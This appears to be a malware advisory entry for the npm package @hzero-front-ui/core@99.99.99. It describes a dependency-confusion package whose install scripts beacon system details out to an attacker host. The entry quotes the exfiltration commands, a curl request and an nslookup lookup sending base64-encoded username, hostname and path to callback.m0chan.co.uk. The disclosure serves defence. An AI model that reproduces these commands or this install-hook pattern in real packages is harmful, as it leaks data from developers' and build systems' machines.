VDB
KO

MAL-2026-13969

Malicious code in @hzero-front-ui/core (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7821a8d1a76ccfc9b3e0649ad6b600927c9c3448ee083d47809026588daa77ca) Package @hzero-front-ui/core@99.99.99 is a hollow shell (index.js is only `module.exports = {};`) whose sole functional content is preinstall/install lifecycle scripts. On `npm install`, those scripts collect the installer's username (`whoami`), hostname, current working directory, and npm package name, base64-encode the concatenation, and transmit it to attacker-controlled subdomains of callback.m0chan.co.uk via two channels: an HTTPS GET (`curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64`) and a DNS lookup (`nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk`). The 99.99.99 version and hollow contents under an org-shaped `@hzero-front-ui` scope are the standard dependency-confusion shape — a public-registry high-version package published to shadow an internal namesake and beacon out from any build system that mis-resolves the internal name.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / @hzero-front-ui/core

No fixed version published yet for @hzero-front-ui/core (npm). Pin to a known-safe version or switch to an alternative.

References